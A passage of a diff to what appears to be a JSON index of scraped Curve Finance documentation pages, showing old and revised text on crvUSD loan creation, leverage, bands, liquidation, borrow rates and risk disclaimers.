Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Loan Creation Leveraging Loans Loan creation Loan Creation In standard mode, creating a loan using $crvUSD only requires setting how much of the collateral asset you would like to add, and how much $crvUSD you would like to borrow in return. After you have set your collateral amount, the UI will display the maximum amount you can borrow. The UI includes a dropdown for additional loan parameters like the current Oracle Price and Borrow Rate . Loan Parameters A: The amplification parameter A defines the density of liquidity and band size. Base Price: The base price is the price of the band number 0. Oracle Price: The oracle price is the current price of the collateral as determined by the oracle. The oracle price is used to calculate the collateral's value and the loan's health. Borrow Rate: The borrow rate is the annual interest rate charged on the loan. This rate is variable and can change based on market conditions. The borrow rate is expressed as a percentage. For example, a borrow rate of 7.62% means that you will be charged 7.62% interest per year on the outstanding balance of your loan. You can toggle advanced mode in the upper right-hand side of the screen. The advanced mode adds a display with more information about the current distribution across all the bands within the entire LLAMMA . It also enhances the loan creation interface by displaying the liquidation and band range, number of bands, borrow rate, and Loan to Value ratio (LTV). Additionally, users can manually select the number of bands for the loan by pressing the \"adjust\" button and using the slider to increase or decrease the number of bands. Leveraging Loans The UI provides the option to leverage your loan. You can leverage your collateral up to 9x.
This has the effect of repeat trading crvUSD to collateral and depositing to maximize your collateral position. Here explains how leveraging works well. Be careful: if the collateral price dips, you must repay the entire amount to reclaim your initial position. WARNING: The corresponding deleverage button is also not yet available. Toggling the advanced mode expands the display to show additional information about the loan, including the price impact and trade route. Last update: 2023-09-20 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Creation & Management Table of contents Loan Creation Loan Management Leveraging Loans Deleveraging Loans Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into a metapool Depositing into the susd-pool Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Loan Creation Loan Management Leveraging Loans Deleveraging Loans Home $crvUSD Loan Creation In standard mode, creating a loan with crvUSD involves setting the amount of collateral asset to be added and the quantity of crvUSD desired for borrowing. Once the collateral amount is determined, the UI displays the maximum sum available for borrowing, along with the health and borrow rate. The UI includes a dropdown to see additional loan parameters like the current Oracle Price and Borrow Rate . In the upper right-hand side of the screen, there is a toggle for advanced mode. The advanced mode adds an additional display with more information about the current distribution across all the bands within the entire LLAMMA . It also enhances the loan creation interface by displaying the liquidation and band range, number of bands, borrow rate, and Loan to Value ratio (LTV). Additionally, users can manually select the number of bands for the loan by pressing the \"adjust\" button and using the slider to increase or decrease the number of bands. Tip A higher number of bands results in fewer losses when the loan is in soft-liquidation mode, see here . The maximum number of bands is 50, while the minimum is 4. Loan Management Everything needed to manage a loan is available in this interface.
The features include: Loan This tab provides options to Borrow more crvUSD, Repay debt, or Self-Liquidate a loan Collateral Options to add or remove collateral from a loan are available here. Deleverage This tab facilitates loan deleveraging. Find more details here . Info During soft-liquidation, users are unable to add or withdraw collateral. They can choose to either partially or fully repay their crvUSD debt to improve their health ratio or decide to self-liquidate their loan if their collateral composition contains sufficient crvUSD to cover the outstanding debt. If they opt for self-liquidation, the user's debt is fully repaid and the loan will be closed. Any residual amounts are then returned to the user. Leveraging Loans The UI offers a leveraging feature for loans, accessible by navigating to the 'Leverage' tab. More information on how to deleverage a loan here . Info Collateral can be leveraged up to 9x, depending on the number of bands chosen. If a user wants to use the maximum leverage (9x), their loan will have the minimum number of bands (4). Using the highest number of bands (50) only allows for a leverage of up to 3x. For the consequences of using different numbers of bands, see here . The process of leveraging effectively involves repeat trading of crvUSD for collateral and depositing it to maximize the collateral position. Essentially, all borrowed crvUSD is utilized to acquire more collateral. Caution is advised, as a dip in the collateral price would necessitate repaying the entire amount to reclaim the initial position. Here is a good explainer on how leveraging works. Toggling the advanced mode expands the display to show additional information about the loan, including the price impact, trade route and the actual leverage. Deleveraging Loans Deleveraging a loan, irrespective of whether it was leveraged, is an option available through the UI. Users must navigate to the 'Deleverage' tab and input the amount of collateral they intend to allocate for deleveraging. This particular collateral is then converted into crvUSD, which is used to facilitate debt repayment. Info When a user's loan is in soft liquidation, deleveraging is only possible if the loan is fully repaid. Alternatively, the loan can typically be self-liquidated. If the position is not in soft liquidation, the user can deliberately deleverage by any chosen amount. The UI will provide the user with their updated loan details, such as liquidation and band range, borrow rate, and health, as well as the LLAMMA changes of collateral and debt.
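The leverage caps above (9x at 4 bands, about 3x at 50 bands) follow from the loop described: each round borrows against the freshly deposited collateral and swaps the crvUSD back into collateral, which converges geometrically to 1 / (1 - LTV). A minimal sketch; the LTV values are back-calculated from the stated maximums (hence hypothetical) and fees and slippage are ignored:

```python
# Why looping borrow-and-swap converges to 1 / (1 - LTV).
def looped_leverage(ltv: float, rounds: int = 50) -> float:
    """Total collateral multiple after repeatedly borrowing at `ltv`
    and swapping the borrowed crvUSD back into more collateral."""
    total, fresh = 0.0, 1.0          # start with 1 unit of collateral
    for _ in range(rounds):
        total += fresh               # deposit the newly acquired collateral
        fresh *= ltv                 # borrow against it and buy more
    return total

print(looped_leverage(8 / 9))        # ~9.0x, matching the stated 4-band maximum
print(looped_leverage(2 / 3))        # ~3.0x, matching the stated 50-band cap
```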
2023-10-25 Back to top", "labels": [ "Documentation" ] }, { - "title": "Loan details", + "title": "Loan Details & Concepts", "html_url": "https://resources.curve.fi/crvusd/loan-details/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Loan details Table of contents Loan Management Loan Details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Loan Management Loan Details Loan details The Loan Details page shows you information about your loan as well as features to manage your loan. Loan Management Everything you may need to manage your loan is in the dark blue box on the left side of the page. These features include: Loan: Borrow more Repay Self-Liquidate Collateral: Add Remove During soft-liquidation, users are unable to add or withdraw collateral. They can choose to either partially or fully repay their crvUSD debt to improve their health ratio or decide to self-liquidate their loan if their collateral composition contains sufficient crvUSD to cover the outstanding debt. If they opt for self-liquidation, the user's debt is fully repaid and the loan will be closed. Any residual amounts are then returned to the user. Loan Details When you take out a loan with $crvUSD your collateral is spread over a range of liquidation prices. If the asset price drops within this range, you will enter soft liquidation mode. In soft liquidation mode you cannot add more collateral, your only available actions are to repay your loan with $crvUSD or to self-liquidate yourself. Additional displays show information about the entire LLAMMA , including the amount of total debt, as well as your wallet balance. In the upper righthand side of the screen you can toggle advanced mode to get additional information on your loan. In advanced mode the UI changes to show more information about your collateral bands . Advanced mode also adds a tab with more info about the entire LLAMMA . 
Last update: 2023-09-12 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts Loan Details & Concepts Table of contents Loan Details Loan Parameters crvUSD Concepts Bands Borrow Rate Liquidation LLAMMA Loan Health crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into a metapool Depositing into the susd-pool Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Loan Details Loan Parameters crvUSD Concepts Bands Borrow Rate Liquidation LLAMMA Loan Health Home $crvUSD Loan Details & Concepts The Loan Details page displays information pertinent to an individual loan, along with features necessary for loan management. Loan Details When a user creates a loan, their collateral is allocated across a range of liquidation prices. Should the asset price fall within this range, the loan will enter soft-liquidation mode. In this state, the user is not allowed to add additional collateral. The only recourse is to either repay with crvUSD or to self-liquidate the loan. Additional displays provide information about the entire LLAMMA system, showing aspects such as the total amount of debt, along with individual wallet balances. On the upper right-hand side of the screen, switching to advanced mode provides additional details about the loan. In advanced mode the UI changes to show more information about the collateral bands . Advanced mode also adds a tab with more info about the entire LLAMMA . Loan Parameters A: The amplification parameter A defines the density of liquidity and band size. Base Price: The base price is the price of the band number 0. Oracle Price: The oracle price is the current price of the collateral as determined by the oracle. The oracle price is used to calculate the collateral's value and the loan's health. Borrow Rate: The borrow rate is the annual interest rate charged on the loan. This rate is variable and can change based on market conditions. The borrow rate is expressed as a percentage. For example, a borrow rate of 7.62% means that the user will be charged 7.62% interest on the loan's outstanding balance. crvUSD Concepts Bands When loans are created, collateral is spread among several bands. Each band has a range of prices for the asset.
If the price oracle is inside this range of prices, that particular band of collateral is likely to be liquidated. Info The number of bands has a significant influence on the amount of losses when a loan is in soft-liquidation. See here . In the example above, the collateral is distributed into 10 distinct bands. The darker grey indicates collateral that has been converted into crvUSD, while the lighter grey represents the original collateral type. Hovering over any bar reveals details about that specific position within the band, including the corresponding asset prices. During soft liquidation, a band may exhibit a mix of crvUSD and the original collateral. Borrow Rate The borrow rate is variable based on conditions in the pool. For instance, when collateral price is down and some positions are in soft liquidation, the rate can fall. A decreasing rate creates incentive to borrow and dump, while an increasing rate creates incentives to buy crvUSD and repay. The formula for calculating the borrow rate, along with a tool to experiment with it, can be found here . Liquidation In soft liquidation, the collateral within a band is at risk of being converted into crvUSD. If the price recovers, it will be converted back into collateral, although the amount will likely be lower than the initial one. While in soft liquidation mode, users cannot modify their collateral. The only options available are to either partially or fully repay the debt or opt to self-liquidate the position. If a borrower's health continues to decline, they may face a 'hard liquidation,' functioning more like a standard liquidation process, resulting in the erasure of their position. LLAMMA LLAMMA (Lending Liquidation AMM Algorithm) is a fully functional AMM with all the functions a user would expect. For more detail please check the source code . Loan Health Based on a user's collateral and borrow amount, the UI will display the Health score and status. If the position is in soft-liquidation mode, an additional warning will be displayed. Once a loan reaches 0% health, the loan is eligible to be hard-liquidated. Warning The health of a loan decreases when the loan enters soft-liquidation mode and collateral prices change. These losses do not occur only when prices go down but also when the collateral price rises again, resulting in the de-liquidation of the user's loan. This implies that the health of a loan can decrease even though the collateral value of the position increases. If a loan is not in soft-liquidation mode, then no losses occur. Losses also heavily depend on the number of bands used; the more bands there are, the fewer the losses.
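The Loan Parameters list above defines A as controlling band size and the base price as the price of band 0. A sketch of how those two parameters pin down each band's price range, assuming the geometric spacing described in the crvUSD whitepaper, where each successive band's prices scale by (A-1)/A; the function name and example values are illustrative only:

```python
# Band price edges from the amplification parameter A and the base price,
# assuming LLAMMA's geometric spacing: each band shrinks by (A - 1) / A.
def band_edges(base_price: float, A: int, n: int) -> tuple[float, float]:
    """Upper and lower price of band `n` (band 0 starts at the base price)."""
    r = (A - 1) / A                  # width ratio; larger A => thinner bands
    return base_price * r ** n, base_price * r ** (n + 1)

# Hypothetical market: A = 100, base price $1000.
for n in range(3):
    hi, lo = band_edges(1000.0, 100, n)
    print(f"band {n}: {lo:.2f} .. {hi:.2f}")
# band 0: 990.00 .. 1000.00
# band 1: 980.10 .. 990.00
# band 2: 970.30 .. 980.10
```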
2023-10-25 Back to top", "labels": [ "Documentation" ] @@ -1914,15 +1914,15 @@ { "title": "Markets", "html_url": "https://resources.curve.fi/crvusd/markets/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Markets Table of contents Markets Collateral Choices Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Markets Collateral Choices Markets Markets On the Markets page you can view all the available collateral types. The page shows the current borrow rate , total amount of $crvUSD borrowed, and total amount of collateral backing it. If you do not have a position, you can click on any market to create a loan . If you already have a position it will show a dollar sign overlay on the left, and clicking on the market will take you to a page to manage your loan . Collateral Choices While testing $crvUSD, the team created a market for $sfrxETH with a small market cap ($10MM) because it had a compatible oracle. Additional forms of collateral are expected to be approved by the DAO. 
Last update: 2023-09-12 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into a metapool Depositing into the susd-pool Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Collateral Choices Markets On the Markets page you can view all the available collateral types. The page shows the current borrow rate , total amount of $crvUSD borrowed, and total amount of collateral backing it. If you do not have a position, you can click on any market to create a loan . If you already have a position it will show a dollar sign overlay on the left, and clicking on the market will take you to a page to manage your loan . Collateral Choices While testing $crvUSD, the team created a market for $sfrxETH with a small market cap ($10MM) because it had a compatible oracle. Additional forms of collateral are expected to be approved by the DAO.
2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Understanding crvusd", + "title": "Understanding crvUSD", "html_url": "https://resources.curve.fi/crvusd/understanding-crvusd/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Understanding crvusd Table of contents Understanding $crvUSD Risks Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Understanding $crvUSD Risks Understanding crvusd Understanding $crvUSD Curve Stablecoin infrastructure enables users to mint crvUSD using a selection of crypto-tokenized collaterals. Positions are managed passively: if the collateral's price decreases, the system automatically sells off collateral in a soft liquidation mode. If the collateral's price increases, the system recovers the collateral. This process could lead to some losses due to liquidation and de-liquidation. Manage crvUSD positions at https://crvusd.curve.fi/ User guide of crvUSD and introduction of rate & LLAMMA, by 0xreviews Risks Please consider the following risk disclaimers when using the Curve Stablecoin infrastructure: If your collateral enters soft-liquidation mode, you can't withdraw it or add more collateral to your position. Should the price of the collateral drop sharply over a short time interval, your position will get hard-liquidated, with no option of de-liquidation. Please choose your leverage wisely, as you would with any collateralized debt position. If your collateral enters soft-liquidation mode, you can't withdraw it or add more collateral to your position. Should the price of the collateral change drop sharply over a short time interval, it can result in large losses that may reduce your loan's health. If you are in soft-liquidation mode and the price of the collateral goes up sharply, this can result in de-liquidation losses on the way up. If your loan's health is low, value of collateral going up could potentially reduce your underwater loan's health. If the health of your loan drops to zero or below, your position will get hard-liquidated with no option of de-liquidation. Please choose your leverage wisely, as you would with any collateralized debt position. The crvUSD stablecoin and its infrastructure are currently in beta testing. 
As a result, investing in crvUSD carries high risk and could lead to partial or complete loss of your investment due to its experimental nature. You are responsible for understanding the associated risks of buying, selling, and using crvUSD and its infrastructure. The value of crvUSD can fluctuate due to stablecoin market volatility or rapid changes in the liquidity of the stablecoin. crvUSD is exclusively issued by smart contracts, without an intermediary. However, the parameters that ensure the proper operation of the crvUSD infrastructure are subject to updates approved by Curve DAO. Users must stay informed about any parameter changes in the stablecoin infrastructure. Understanding Curve v2 Last update: 2023-09-12 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Understanding crvUSD Table of contents Markets Risks Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into a metapool Depositing into the susd-pool Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Markets Risks Home $crvUSD Understanding crvUSD Curve Stablecoin infrastructure allows users to mint crvUSD using a variety of crypto-tokenized collaterals. Positions are managed passively: if the price of the collateral decreases, the system automatically initiates a 'soft-liquidation' process to sell off some of the collateral. Conversely, if the price of the collateral increases, the system recovers the collateral. However, this process may result in some losses due to the liquidations and de-liquidations. Manage crvUSD positions at https://crvusd.curve.fi/ Markets On the 'Markets' tab, all available collateral types are displayed. The page displays the current borrow rate , total debt, debt cap, remaining amount available for borrowing, and the total value of collateral. If no loan exists, clicking on any market will lead to the loan creation page. Should a loan already exist, a dollar sign overlay will appear on the left. Selecting the market will lead to the loan management interface. Risks Please consider the following risk disclaimers when using the Curve Stablecoin infrastructure: If your collateral enters soft-liquidation mode, you can't withdraw it or add more collateral to your position.
Should the price of the collateral drop sharply over a short time interval, your position will get hard-liquidated, with no option of de-liquidation. Please choose your leverage wisely, as you would with any collateralized debt position. If your collateral enters soft-liquidation mode, you can't withdraw it or add more collateral to your position. Should the price of the collateral drop sharply over a short time interval, it can result in large losses that may reduce your loan's health. If you are in soft-liquidation mode and the price of the collateral goes up sharply, this can result in de-liquidation losses on the way up. If your loan's health is low, the value of collateral going up could potentially reduce your underwater loan's health. If the health of your loan drops to zero or below, your position will get hard-liquidated with no option of de-liquidation. Please choose your leverage wisely, as you would with any collateralized debt position. The crvUSD stablecoin and its infrastructure are currently in beta testing. As a result, investing in crvUSD carries high risk and could lead to partial or complete loss of your investment due to its experimental nature. You are responsible for understanding the associated risks of buying, selling, and using crvUSD and its infrastructure. The value of crvUSD can fluctuate due to stablecoin market volatility or rapid changes in the liquidity of the stablecoin. crvUSD is exclusively issued by smart contracts, without an intermediary. However, the parameters that ensure the proper operation of the crvUSD infrastructure are subject to updates approved by Curve DAO. Users must stay informed about any parameter changes in the stablecoin infrastructure. 2023-10-18 Back to top", "labels": [ "Documentation" ] }, { "title": "Understanding tokenomics", "html_url": "https://resources.curve.fi/crvusd/understanding-tokenomics/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics Understanding tokenomics Table of contents $crvUSD Concepts Bands Borrow Rate Liquidation LLAMMA Loan Health FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents $crvUSD Concepts Bands Borrow Rate Liquidation LLAMMA Loan Health Understanding tokenomics $crvUSD Concepts Bands When loans are created,
collateral is spread among several bands. Each band has a range of prices for the asset. If the price oracle is inside this range of prices, that particular band of collateral is likely to be liquidated. In the example above, the collateral has been spread into 10 different bands of collateral. The darker grey represents collateral which has been converted into $crvUSD, lighter grey is the original collateral type. Mousing over any bar will give you details about your position within the band, as well as the asset prices corresponding to this band. If you are in soft liquidation, the band may have a blend of $crvUSD and the collateral. Borrow Rate The borrow rate is variable basd on conditions in the pool. For instance, when collateral price is down and some positions are in soft liquidation, the rate can fall. A decreasing rate creates incentive to borrow and dump, while an increasing rate creates incentives to buy $crvUSD and repay. The formula for calculating Borrow Rate is: rate = rate0 * exp(-(p - 1) / sigma) * exp(-peg_keeper_debt / (total_debt * peg_keeper_target_fraction)) Liquidation In soft liquidation, the collateral within a band is at risk of being converted into crvUSD. If the price goes back, it will be rehypothecated into collateral, although it will likely be lower than the initial amount. While in soft liquidation mode, users cannot modify their collateral. The only options available are to either partially or fully repay the debt or opt to self-liquidate the position. If your health continues to weaken, you may find yourself subject to \"hard liquidation,\" which functions more like a usual liquidation, where your position is erased. LLAMMA LLAMA (Lending Liquidation AMM Algorithm) is a fully functional AMM with all the functions you would expect. For more detail please check the source code . Loan Health Based on your collateral and borrow amount, the UI will display the Health score. Low health scores are more at risk of entering liquidation mode in the event the asset price drops. 
Last update: 2023-09-12 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into a metapool Depositing into the susd-pool Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents $crvUSD Concepts Bands Borrow Rate Liquidation LLAMMA Loan Health Understanding tokenomics $crvUSD Concepts Bands When loans are created, collateral is spread among several bands. Each band has a range of prices for the asset. If the price oracle is inside this range of prices, that particular band of collateral is likely to be liquidated. In the example above, the collateral has been spread into 10 different bands of collateral. The darker grey represents collateral which has been converted into $crvUSD, lighter grey is the original collateral type. Mousing over any bar will give you details about your position within the band, as well as the asset prices corresponding to this band. If you are in soft liquidation, the band may have a blend of $crvUSD and the collateral. Borrow Rate The borrow rate is variable based on conditions in the pool. For instance, when collateral price is down and some positions are in soft liquidation, the rate can fall. A decreasing rate creates incentive to borrow and dump, while an increasing rate creates incentives to buy $crvUSD and repay. The formula for calculating Borrow Rate is: rate = rate0 * exp(-(p - 1) / sigma) * exp(-peg_keeper_debt / (total_debt * peg_keeper_target_fraction)) Liquidation In soft liquidation, the collateral within a band is at risk of being converted into crvUSD. If the price goes back up, it will be converted back into collateral, although the amount will likely be lower than the initial amount. While in soft liquidation mode, users cannot modify their collateral. The only options available are to either partially or fully repay the debt or opt to self-liquidate the position. If your health continues to weaken, you may find yourself subject to \"hard liquidation,\" which functions more like a usual liquidation, where your position is erased. LLAMMA LLAMMA (Lending-Liquidating AMM Algorithm) is a fully functional AMM with all the functions you would expect. For more detail please check the source code .
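For intuition, the borrow-rate formula quoted above can be transcribed directly into a minimal Python sketch; the parameter names mirror the formula, and the numbers below are purely illustrative, not live protocol values.

```python
import math

def borrow_rate(rate0, p, sigma, peg_keeper_debt, total_debt, target_fraction):
    # Direct transcription of the formula quoted above: the first factor
    # raises the rate when crvUSD trades below peg (p < 1), and the second
    # lowers it as PegKeeper debt grows relative to total debt.
    return (rate0
            * math.exp(-(p - 1) / sigma)
            * math.exp(-peg_keeper_debt / (total_debt * target_fraction)))

# Illustrative values only (not live protocol parameters):
print(borrow_rate(0.05, 0.995, 0.02, 1e6, 1e8, 0.10))  # below peg -> rate rises
print(borrow_rate(0.05, 1.005, 0.02, 1e6, 1e8, 0.10))  # above peg -> rate falls
```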
Loan Health Based on your collateral and borrow amount, the UI will display the Health score. Low health scores are more at risk of entering liquidation mode in the event the asset price drops. 2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -1938,7 +1938,7 @@ { "title": "Creating a cryptoswap pool", "html_url": "https://resources.curve.fi/factory-pools/creating-a-cryptoswap-pool/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Creating a cryptoswap pool Table of contents Creating a Cryptoswap Pool Creating a Pool Tokens in Pool Pool Presets Parameters Understanding oracles Troubleshooting 